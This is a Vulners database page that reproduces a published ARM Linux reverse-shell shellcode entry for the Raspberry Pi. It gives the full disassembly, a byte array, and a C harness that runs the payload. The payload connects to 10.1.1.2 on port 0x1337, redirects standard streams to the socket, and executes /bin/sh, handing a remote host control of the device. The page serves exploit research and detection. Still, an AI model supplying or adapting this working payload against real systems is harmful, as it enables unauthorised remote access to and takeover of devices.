Vulners
Lucene search
[Raspberry Pi] Linux/ARM - reverse_shell(tcp,10.1.1.2,0x1337)
/*
Title: Linux/ARM - reverse_shell(tcp,10.1.1.2,0x1337)
execve("/bin/sh", [0], [0 vars]) - 72 bytes
Date: 2012-09-08
Tested on: ARM1176JZF-S (v6l) - Raspberry Pi
Author: midnitesnake
00008054 <_start>:
8054: e28f1001 add r1, pc, #1
8058: e12fff11 bx r1
805c: 2002 movs r0, #2
805e: 2101 movs r1, #1
8060: 1a92 subs r2, r2, r2
8062: 020f lsls r7, r1, #8
8064: 3719 adds r7, #25
8066: df01 svc 1
8068: 1c06 adds r6, r0, #0
806a: a108 add r1, pc, #32 ; (adr r1,
808c <Dup+0x16>)
806c: 2210 movs r2, #16
806e: 3702 adds r7, #2
8070: df01 svc 1
8072: 273f movs r7, #63 ; 0x3f
8074: 2102 movs r1, #2
00008076 <Dup>:
8076: 1c30 adds r0, r6, #0
8078: df01 svc 1
807a: 3901 subs r1, #1
807c: d5fb bpl.n 8076 <Dup>
807e: a005 add r0, pc, #20 ; (adr r0,
8094 <Dup+0x1e>)
8080: 1a92 subs r2, r2, r2
8082: b405 push {r0, r2}
8084: 4669 mov r1, sp
8086: 270b movs r7, #11
8088: df01 svc 1
808a: 46c0 nop ; (mov r8, r8)
808c: 37130002 .word 0x37130002
8090: 0301010a .word 0x0301010a
8094: 6e69622f .word 0x6e69622f
8098: 0068732f .word 0x0068732f
809c: 00 .byte 0x00
809d: 00 .byte 0x00
809e: 46c0 nop ; (mov r8, r8)
*/
#include <stdio.h>
#include <string.h>
#define SWAP16(x) ((x) << 8 | ((x) >> 8))
const unsigned char sc[] = {
0x01, 0x10, 0x8F, 0xE2,
0x11, 0xFF, 0x2F, 0xE1,
0x02, 0x20, 0x01, 0x21,
0x92, 0x1a, 0x0f, 0x02,
0x19, 0x37, 0x01, 0xdf,
0x06, 0x1c, 0x08, 0xa1,
0x10, 0x22, 0x02, 0x37,
0x01, 0xdf, 0x3f, 0x27,
0x02, 0x21,
0x30, 0x1c, 0x01, 0xdf,
0x01, 0x39, 0xfb, 0xd5,
0x05, 0xa0, 0x92, 0x1a,
0x05, 0xb4, 0x69, 0x46,
0x0b, 0x27,0x01, 0xdf,
0xc0, 0x46,
/* struct sockaddr */
0x02, 0x00,
/* port: 0x1337 */
0x13, 0x37,
/* ip: 10.1.1.2 */
0x0A, 0x01, 0x01, 0x02,
/* "/bin/sh\0" */
0x2f, 0x62, 0x69, 0x6e,0x2f, 0x73, 0x68, 0x00
};
int main()
{
printf("shellcode=%d bytes\n"
"connecting to %d.%d.%d.%d:%hd\n", sizeof sc,
sc[0x3c], sc[0x3d], sc[0x3e], sc[0x3f],
SWAP16(*((unsigned short *)(sc+0x3a))));
return ((int (*)(void))sc)();
}
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
01 Jul 2014 00:00Current
7.1High risk
Vulners AI Score7.1